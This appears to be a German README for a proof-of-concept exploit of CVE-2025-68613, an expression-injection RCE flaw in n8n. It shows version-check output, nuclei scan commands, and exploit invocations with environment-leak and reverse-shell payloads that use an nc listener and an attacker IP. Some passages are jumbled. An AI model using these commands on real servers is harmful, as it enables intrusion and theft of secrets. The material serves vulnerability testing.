
CVE-2025-68613

Schweregrad: 🔴 Kritisch Auswirkung: Remote Code Execution Betroffene Plattform: n8n (Workflow-Automatisierung)
CVE-2025-68613 ist eine kritische Sicherheitslücke in n8n, einer Open-Source-Plattform für Workflow-Automatisierung. Das Problem erlaubt es einem authentifizierten Angreifer, beliebigen Code auf dem Server auszuführen, indem missbräuchlich ausgenutzt wird, wie Workflow-Ausdrücke ausgewertet werden.
💥 Warum das gefährlich ist: Bösartige Ausdrücke werden in einem Kontext ausgewertet, der nicht ordnungsgemäß isoliert (sandboxed) ist, wodurch Zugriff auf die zugrunde liegende Laufzeitumgebung möglich wird.

Bei erfolgreicher Ausnutzung könnte ein Angreifer:
Der Angriff läuft mit denselben Berechtigungen wie der n8n-Dienst, was die Auswirkungen verstärkt.
| Metric | Value |
|---|---|
| CVSS v3.1 | ~9.9–10.0 |
| Confidentiality | High |
| Integrity | High |
| Availability |
➡️ Eine Authentifizierung ist erforderlich, aber kein Administratorzugriff wird benötigt.
🚫 Verwundbar:
0.211.0 → 1.120.31.121.0✅ Behoben:
1.120.41.121.11.122.0 und neuer(Entfernt die Schwachstelle NICHT vollständig)
CVE-2025-68613.py — Remote-Versions- & Expositionsprüfer (Sicher)sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2
--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678
Oder wenn du eine Liste von Hosts scannen möchtest, führe aus:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt
Beispielausgabe
Verwendungsbeispiele:
Umgebungsvariablen leaken:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak
Benutzerinformationen abrufen:
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id
Reverse Shell (zuerst Listener starten: nc -lvnp 4444):
python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444
Dieses Skript dient ausschließlich autorisierten Sicherheitstests an Systemen, die dir gehören oder für die du eine ausdrückliche Testberechtigung besitzt.
🔒 Dieses Skript ist ein Proof-of-Concept (PoC)-Exploit für CVE-2025-68613 in n8n.
📚 Es wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt.
🛡️ Verwende es ausschließlich auf Systemen, die du besitzt, kontrollierst oder für die du eine ausdrückliche schriftliche Genehmigung zum Testen hast.
🚫 Unbefugte Nutzung gegen ein beliebiges System ist illegal und kann gegen Gesetze verstoßen (z. B. Computerbetrugs- und Missbrauchsgesetze).
❌ Der Autor und alle verbundenen Parteien übernehmen keine Haftung für Missbrauch, Schäden oder rechtliche Konsequenzen.
✅ Verwende es verantwortungsvoll, ethisch und in voller Übereinstimmung mit allen geltenden Gesetzen und Vorschriften.
🔐 Wenn du Penetrationstests durchführst, stelle sicher, dass eine ordnungsgemäße Autorisierung (z. B. Rules of Engagement) vorliegt.
🛠️ Sicherheitsforscher können dies nutzen, um Schwachstellen zu verifizieren und zeitnahe Patches zu fördern.
| High |
| Category | Info |
|---|
| CVE ID | CVE-2025-68613 |
| Product | n8n |
| Bug Class | Expression Injection |
| Result | Remote Code Execution |
| Access Needed | Authenticated user |
| Fix Available | Yes |